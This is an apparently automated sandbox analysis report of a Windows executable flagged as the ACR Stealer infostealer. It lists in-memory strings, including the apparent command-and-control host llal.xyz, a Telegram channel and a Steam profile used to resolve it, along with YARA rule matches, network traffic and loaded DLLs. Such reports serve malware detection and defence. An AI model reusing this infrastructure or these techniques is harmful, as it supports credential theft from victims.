Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | String found in binary or memory: https://help.steampowered.com/en/
Source: OXoeX1Ii3x.exe | String found in binary or memory: https://https://t.me/asdfghjrrewqqqqtfg/ujs/WorldHellostrwvfncexGostrbrCHbrGkunknownftpac/Up/gltype
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693936827.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870379982.000000000302E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://llal.xyz
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000003000000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://llal.xyz/
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000003000000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://llal.xyz/I
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693936827.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870379982.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000003000000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693936827.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870379982.000000000302E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d$
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693936827.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870379982.000000000302E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842du
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000003000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/6#
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/discussions/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199619938930
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/market/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: OXoeX1Ii3x.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930-
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930/badges
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930/inventory/
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611996199389306
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930=
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930C
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930H
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930V
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870239685.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930t
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/about/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/explore/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/legal/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/mobile
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/news/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/points/shop/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/stats/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: OXoeX1Ii3x.exeString found in binary or memory: https://t.me/asdfghjrrewqqqqtfg
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2

System Summary

Source: OXoeX1Ii3x.exe, type: SAMPLEMatched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
Source: 0.0.OXoeX1Ii3x.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
Source: 0.2.OXoeX1Ii3x.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0017C03A0_2_0017C03A
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001423C80_2_001423C8
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001445390_2_00144539
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0014469F0_2_0014469F
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001428E20_2_001428E2
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001669300_2_00166930
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001689600_2_00168960
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0017AA6E0_2_0017AA6E
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00144B0C0_2_00144B0C
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00160C700_2_00160C70
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0016AE840_2_0016AE84
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001530A20_2_001530A2
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001414240_2_00141424
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001454620_2_00145462
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001537C60_2_001537C6
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001538200_2_00153820
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00141A8D0_2_00141A8D
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: String function: 0017FC67 appears 91 times
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: String function: 0014A85F appears 66 times
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: String function: 0015D5B0 appears 52 times
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: String function: 0017FC9A appears 73 times
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7504 -s 2016
Source: OXoeX1Ii3x.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
Source: OXoeX1Ii3x.exe, type: SAMPLEMatched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
Source: 0.0.OXoeX1Ii3x.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
Source: 0.2.OXoeX1Ii3x.exe.140000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
Source: classification engineClassification label: mal84.troj.winEXE@2/6@2/2
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0015AFE8 __EH_prolog3_GS,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep,0_2_0015AFE8
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199619938930[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7504
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\1bd116bb-b209-482a-b38b-e01429fca7f2Jump to behavior
Source: OXoeX1Ii3x.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: OXoeX1Ii3x.exeVirustotal: Detection: 52%
Source: OXoeX1Ii3x.exeReversingLabs: Detection: 68%
Source: unknownProcess created: C:\Users\user\Desktop\OXoeX1Ii3x.exe "C:\Users\user\Desktop\OXoeX1Ii3x.exe"
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7504 -s 2016
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: cryptbase.dllJump to behavior
